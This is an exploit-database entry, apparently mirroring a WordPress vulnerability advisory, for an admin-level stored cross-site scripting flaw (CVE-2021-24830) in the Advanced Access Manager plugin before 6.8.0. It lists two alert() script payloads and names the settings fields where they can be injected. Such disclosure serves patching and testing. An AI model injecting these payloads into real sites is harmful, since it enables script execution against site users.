Exploit for Advanced Access Manager < 6.8.0 - Admin+ Stored Cross-Site Scripting CVE-2021-24830

Name: Exploit for Advanced Access Manager < 6.8.0 - Admin+ Stored Cross-Site Scripting CVE-2021-24830
Rating: 5 (292 reviews)

2021-10-19 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:1C46373B-D43D-4D18-B0AE-3711FB0BE0F9
Put the following payload in any of the plugin's settings with a text input:
- v < 6.7.9 - "><script>alert(/XSS/)</script>
- v < 6.8.0 - " onfocus=alert(/XSS/)//

For example in "404 Redirect" > "Redirected to the local URL" > "The URL", "URI Access" > Create > "Enter URL" etc

The XSS will be triggered when accessing the plugin setting again